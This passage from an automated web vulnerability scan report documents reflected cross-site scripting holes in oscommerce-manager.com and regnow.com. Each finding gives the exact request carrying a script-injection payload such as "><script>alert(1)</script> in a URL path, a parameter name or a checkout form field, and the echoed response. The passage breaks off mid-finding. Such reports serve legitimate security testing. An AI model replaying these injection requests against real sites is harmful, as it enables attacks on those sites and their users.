Last-Modified: Sun, 15 May 2011 14:02:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gifee376"><script>alert(1)</script>241027ec1dc')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.156. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-expanded.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b045"><script>alert(1)</script>29d3f4373d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/images/menu-expanded.gif?3b045"><script>alert(1)</script>29d3f4373d4=1 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif?3b045"><script>alert(1)</script>29d3f4373d4=1')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.157. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-leaf.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1a5"><script>alert(1)</script>784c4fce844 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes9f1a5"><script>alert(1)</script>784c4fce844/oscmanager/images/menu-leaf.gif HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes9f1a5"><script>alert(1)</script>784c4fce844/oscmanager/images/menu-leaf.gif')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.158. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-leaf.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e03d8"><script>alert(1)</script>bdf9f240bf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanagere03d8"><script>alert(1)</script>bdf9f240bf5/images/menu-leaf.gif HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanagere03d8"><script>alert(1)</script>bdf9f240bf5/images/menu-leaf.gif')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.159. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-leaf.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef7d"><script>alert(1)</script>c12fe7265ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/images7ef7d"><script>alert(1)</script>c12fe7265ca/menu-leaf.gif HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/images7ef7d"><script>alert(1)</script>c12fe7265ca/menu-leaf.gif')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.160. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-leaf.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e58"><script>alert(1)</script>1331439b8c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/images/menu-leaf.gifc9e58"><script>alert(1)</script>1331439b8c6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:02:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:02:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gifc9e58"><script>alert(1)</script>1331439b8c6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.161. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-leaf.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 600a9"><script>alert(1)</script>2671288c97c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/images/menu-leaf.gif?600a9"><script>alert(1)</script>2671288c97c=1 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif?600a9"><script>alert(1)</script>2671288c97c=1')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.162. http://www.oscommerce-manager.com/themes/oscmanager/main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f8cd"><script>alert(1)</script>62cd40caa8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes1f8cd"><script>alert(1)</script>62cd40caa8b/oscmanager/main.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes1f8cd"><script>alert(1)</script>62cd40caa8b/oscmanager/main.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.163. http://www.oscommerce-manager.com/themes/oscmanager/main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e79fc"><script>alert(1)</script>e125c6ed553 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanagere79fc"><script>alert(1)</script>e125c6ed553/main.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanagere79fc"><script>alert(1)</script>e125c6ed553/main.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.164. http://www.oscommerce-manager.com/themes/oscmanager/main.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/main.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 193f0"><script>alert(1)</script>93bc7f90304 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/main.css193f0"><script>alert(1)</script>93bc7f90304?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/main.css193f0"><script>alert(1)</script>93bc7f90304?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.165. http://www.oscommerce-manager.com/themes/oscmanager/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ca2f"><script>alert(1)</script>b92bcd436dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes1ca2f"><script>alert(1)</script>b92bcd436dc/oscmanager/style.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes1ca2f"><script>alert(1)</script>b92bcd436dc/oscmanager/style.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.166. http://www.oscommerce-manager.com/themes/oscmanager/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7585b"><script>alert(1)</script>549d6025e2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager7585b"><script>alert(1)</script>549d6025e2d/style.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager7585b"><script>alert(1)</script>549d6025e2d/style.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.167. http://www.oscommerce-manager.com/themes/oscmanager/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e62"><script>alert(1)</script>0d05b4aca19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/style.css87e62"><script>alert(1)</script>0d05b4aca19?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/style.css87e62"><script>alert(1)</script>0d05b4aca19?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.168. https://www.regnow.com/checkout/cart/edit [bill_addr.country parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The value of the bill_addr.country request parameter is copied into the HTML document as plain text between tags. The payload 31035<script>alert(1)</script>2b5d3cef309 was submitted in the bill_addr.country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_a
...[SNIP]...
ail=&bill_addr_confirm_email=&bill_addr.fname=&bill_addr.lname=&bill_addr.company=&bill_addr.phone=&bill_addr.add1=&bill_addr.add2=&bill_addr.city=&bill_addr.state=&bill_addr.zip=&bill_addr.country=US31035<script>alert(1)</script>2b5d3cef309&vat_number=&use_bill_as_ship_addr=1&opt_in_present=&opt_in=1&ship_addr.fname=&ship_addr.lname=&ship_addr.company=&ship_addr.phone=&ship_addr.email=&ship_addr_confirm_email=&ship_addr.add1=&ship_addr.
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:51:39 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 14:51:41 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 14:51:41 GMT
Content-Length: 75428
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'US31035<script>alert(1)</script>2b5d3cef309' is not a valid value</li>
...[SNIP]...

3.169. https://www.regnow.com/checkout/cart/edit [bill_addr.state parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The value of the bill_addr.state request parameter is copied into the HTML document as plain text between tags. The payload f7cf3<script>alert(1)</script>6fda55ceb90 was submitted in the bill_addr.state parameter. This input was echoed unmodified in the application's response.

